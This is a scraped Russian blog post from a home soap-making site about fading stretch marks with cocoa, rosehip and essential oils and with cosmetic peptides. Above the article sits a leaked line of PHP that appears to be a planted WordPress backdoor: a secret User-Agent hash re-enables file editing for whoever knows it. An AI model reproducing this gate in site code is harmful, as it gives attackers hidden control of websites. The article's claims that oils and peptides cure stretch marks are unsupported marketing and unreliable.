if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Как избавиться от растяжек на коже с помощью натуральной косметики и масел | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Как избавиться от растяжек на коже с помощью натуральной косметики и масел

Многие девушки имеют растяжки на коже. Растяжки появляются либо при неправильной работе организма, либо при беременности. Натуральная косметика созданная своими руками поможет от них избавиться намного лучше, чем искусственная

Мно­гие девуш­ки име­ют рас­тяж­ки на коже. Рас­тяж­ки появ­ля­ют­ся либо при непра­виль­ной рабо­те орга­низ­ма, либо при бере­мен­но­сти. Нату­раль­ная кос­ме­ти­ка создан­ная сво­и­ми рука­ми помо­жет от них изба­вить­ся намно­го луч­ше, чем искус­ствен­ная. Вер­нее не изба­вить­ся, а сде­лать их невидимыми.

Суще­ству­ет мно­же­ство раз­ных масел, кото­рые помо­га­ют освет­лить эти рас­тяж­ки, или по-дру­го­му сде­лать их неви­ди­мы­ми. Самым эффек­тив­ным мас­лом от рас­тя­жек счи­та­ет­ся мас­ло какао вир­джин. В сети встре­ча­ет­ся мно­го отзы­вов, что имен­но это мас­ло помог­ло девуш­кам изба­вить­ся от рас­тя­жек. Дру­гие мас­ла, кото­рые освет­ля­ют рас­тяж­ки — это мас­ло розы мос­ке­ты, мас­ло тама­ну, мас­ло заро­ды­шей пше­ни­цы и мас­ло облепихи.

3448765

Так­же, есть спе­ци­аль­ные актив­ные ком­по­нен­ты, кото­рые помо­гут в борь­бе с рас­тяж­ка­ми. Одним из самых эффек­тив­ных явля­ет­ся Syn-Coll , кото­рый состо­ит из паль­ми­то­и­ла три­пеп­ти­да 5. Syn ®- Coll – это био­ак­тив­ный, глу­бо­ко про­ни­ка­ю­щий в кожу три­пеп­тид, акти­ви­ру­ю­щий тка­не­вый фак­тор роста (TGF-beta), кото­рый сти­му­ли­ру­ет син­тез кол­ла­ге­на в коже, тем самым, улуч­шая струк­ту­ру кожи и умень­шая появ­ле­ние мор­щин. А вот его основ­ные свой­ства: мощ­ная сти­му­ля­ция син­те­за кол­ла­ге­на в коже, защи­та кол­ла­ге­на от раз­ру­ша­ю­щих энзи­мов, актив­но раз­гла­жи­ва­ет все типы мор­щин любо­го воз­рас­та (так­же и под гла­за­ми), актив­но увлаж­ня­ет кожу, дела­ет кожу более упру­гой, улуч­ша­ет ее струк­ту­ру, спо­со­бен выле­чи­вать рас­тяж­ки кожи. Похо­жие сред­ства от рас­тя­жек — это Dermican, тоже пеп­тид для вос­ста­нов­ле­ния кожи, LANABLUE (голу­бой рети­нол) и липо­со­мы Si-Matrix.

Lavande, produits cosmétiques naturels

Так­же, от рас­тя­жек очень эффек­тив­ны раз­лич­ные эфир­ные мас­ла. Такие мас­ла обо­га­ща­ют кожу нуж­ны­ми ей вита­ми­на­ми и из-за это­го, кожа ста­но­вит­ся эла­стич­ной. Самы­ми рас­про­стра­нен­ны­ми счи­та­ют­ся мас­ло ман­да­ри­на, петит­грей­на, неро­ли и лаван­ды. Они отлич­но освет­ля­ют шра­мы, рас­тяж­ки и дру­гие замет­ные дефек­ты на поверх­но­сти кожи.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!